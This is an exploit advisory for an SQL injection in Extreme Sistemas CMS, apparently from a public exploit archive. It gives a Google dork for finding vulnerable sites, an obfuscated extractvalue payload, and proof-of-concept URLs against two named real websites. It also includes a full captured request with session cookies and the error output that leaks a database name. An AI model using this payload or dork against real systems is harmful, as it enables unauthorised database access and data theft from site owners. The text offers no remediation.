[+] Sql Injection on Extreme Sistemas CMS [+] Date: 08/05/2019 [+] Risk: High [+] CWE Number : CWE-89 [+] Author: Felipe Andrian Peixoto [+] Vendor Homepage: http://www.extremesistemas.com.br/criacao-de-sites [+] Contact: felipe_andrian@hotmail.com [+] Tested on: Windows 7 and Gnu/Linux [+] Dork: inurl:"pagina.aspx?cat=" // use your brain ;) [+] Exploit : http://host/patch/pagina.aspx?cat= [SQL Injection] [+] PoC : http://www.advlink.com.br/pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- http://www.automecanicamiguel.com.br/pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- [+] Example: GET /pagina.aspx?cat=pagina.aspx?cat=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- HTTP/1.1 Host: www.advlink.com.br User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: _pk_id.21751.d41e=b782be8e411c8dd2.1557328531.1.1557329566.1557328531.; _pk_ref.21751.d41e=%5B%22%22%2C%22%22%2C1557328531%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; _pk_ses.21751.d41e=*; ASP.NET_SessionId=sem1hd45eqorbv55oayy3y45 DNT: 1 Connection: keep-alive Upgrade-Insecure-Requests: 1 ERROR [HY000] [MySQL][ODBC 5.1 Driver][mysqld-5.6.35-81.0-log]XPATH syntax error: 's3x0u:advlink_novo:s3x0u' ......... [+] EOF